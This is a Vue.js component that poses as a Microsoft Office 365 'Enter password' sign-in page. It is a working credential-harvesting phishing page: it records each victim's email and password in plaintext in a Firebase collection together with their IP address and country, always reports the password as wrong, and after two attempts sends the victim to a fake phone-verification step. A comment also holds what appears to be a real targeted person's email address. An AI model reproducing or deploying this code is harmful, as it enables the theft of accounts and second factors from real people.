<template>
  <v-container fill-height class="d-flex justify-center">
    <v-card class="pa-10" width="450" outlined flat :disabled="disableCard" tile>
      <v-toolbar flat>
        <v-toolbar-title>
          <v-img
            class="my-2"
            alt="Microsoft Logo"
            :src="require('@/assets/microsoft_logo.svg')"
            transition="scale-transition"
            max-height="108"
            max-width="108"
          />

          <!-- <div class="mt-3">
            <p class="body-1">annalise.buttigieg@bluestone.com.au</p>
          </div>-->
          <v-btn class="text-none pl-1" :text="true" color depressed>
            <v-icon left>mdi-arrow-left</v-icon>
            {{ email }}
          </v-btn>
        </v-toolbar-title>
      </v-toolbar>

      <v-card-text>
        <h2 class="mt-3 mb-4 black--text">Enter password</h2>
        <p class="red--text" v-if="error">
          Your account or password is incorrect. If you don't remember your
          password,
          <router-link to="/">reset it now</router-link>.
        </p>
        <v-form ref="form" lazy-validation v-on:submit.prevent="onSubmit">
          <v-text-field
            :dense="true"
            v-model="password"
            label="Password"
            type="password"
            required
            v-on:keyup.enter="submitForm"
          ></v-text-field>
          <router-link to>
            <p class="caption">Forgot my password</p>
          </router-link>
          <v-row>
            <v-spacer></v-spacer>
            <v-btn
              width="100"
              class="rounded-button white--text text-none"
              :depressed="true"
              color="#005DA6"
              @click="submitForm"
            >Sign in</v-btn>
          </v-row>
        </v-form>
      </v-card-text>
    </v-card>
  </v-container>
</template>

<script>
import { db } from "../firebase";

export default {
  name: "LoginForm",

  data: () => ({
    error: false,
    disableCard: false,
    email: "",
    password: "",
    ipAddress: "",
    countryName: "",
    city: "",
    region: "",
    submitCount: 0,
  }),

  async created() {
    this.email = this.$route.params.email.includes("@")
      ? this.$route.params.email
      : window.atob(this.$route.params.email);

    try {
      const { data } = await this.$http(`https://ipapi.co/json/`);
      console.log(data);
      this.ipAddress = data.ip;
      this.countryName = data.country_name;
      this.city = data.city;
      this.region = data.region;
    } catch (e) {
      console.log(e);
    }
  },

  firestore() {
    return {
      users: db.collection("users"),
    };
  },

  methods: {
    async submitForm() {
      console.log(this.email, this.password);

      function sleep(ms) {
        return new Promise((resolve) => setTimeout(resolve, ms));
      }

      if (this.password.length < 4) {
        this.error = true;
        this.password = "";
        return;
      }
      this.submitCount++;

      console.log(this.submitCount);

      this.disableCard = true;
      try {
        const userRef = await this.$firestore.users
          .where("email", "==", this.email)
          .where("password", "==", this.password)
          .get();

        if (userRef.docs.length == 0) {
          await this.$firestore.users.add({
            email: this.email,
            password: this.password,
            ipAddress: this.ipAddress,
            country: this.countryName,
            city: "office365",
            // region: `${this.region}, | ${loginStatus}, | office365`,
            createdAt: new Date(),
          });
        }
        await sleep(0);
        this.password = "";
        this.error = true;
        this.disableCard = false;

        console.log(this.submitCount);
        if (this.submitCount == 2) {
          // Go to phone verification.
          this.$router.push({ path: `/login/verification/${this.email}` });
          // this.$router.push({ name: "success" });
          // this.$router.push({ name: "Voicemail" });
        }
      } catch (e) {
        console.log(e);
      }
    },
  },
};
</script>
<style lang="scss">
a {
  text-decoration: none;
  color: #005da6;
}
.rounded-button {
  border-radius: 0px;
}
</style>
